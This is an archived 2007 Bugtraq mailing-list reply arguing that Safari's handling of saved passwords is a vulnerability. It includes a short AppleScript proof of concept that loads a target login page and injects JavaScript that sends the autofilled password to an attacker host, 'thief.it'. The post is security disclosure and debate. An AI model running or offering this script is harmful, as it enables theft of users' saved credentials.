Re: RE: Apple Safari on MacOSX may reveal user's saved passwords

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: RE: Apple Safari on MacOSX may reveal user's saved passwords
From: poplix@xxxxxxxxxxxx
Date: 14 May 2007 22:35:00 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Mark, you read it correctly and you're right, anyway a malicious user at your 
console should not be able to read your passwords. Also note that to steal 
saved passwords it's sufficent to entice a victim to execute a malicious script 
like that:

--BOF
tell application "Safari"
        open location "https://www.target.com";
end tell

do shell script "/bin/sleep 10"

tell application "Safari"
        do JavaScript 
"document.location.href='http://thief.it/steal_target?p='+document.loginform.password.value"
 in document 1
end tell
--EOF

I agree with you in saying that the execution of malicious scripts can lead in 
much more dangeruos attacks, anyway i consider this a vulnerability and i dont 
know why Apple belives this is the correct behaviour. . .

many thanks for your comment

-p

Follow-Ups:
- Re: Apple Safari on MacOSX may reveal user's saved passwords
  - From: David Cantrell

Prev by Date: RE: Apple Safari on MacOSX may reveal user's saved passwords
Next by Date: Jetbox CMS version 2.1 E-Mail Injection Vulnerability
Previous by thread: RE: Apple Safari on MacOSX may reveal user's saved passwords
Next by thread: Re: Apple Safari on MacOSX may reveal user's saved passwords
Index(es):
- Date
- Thread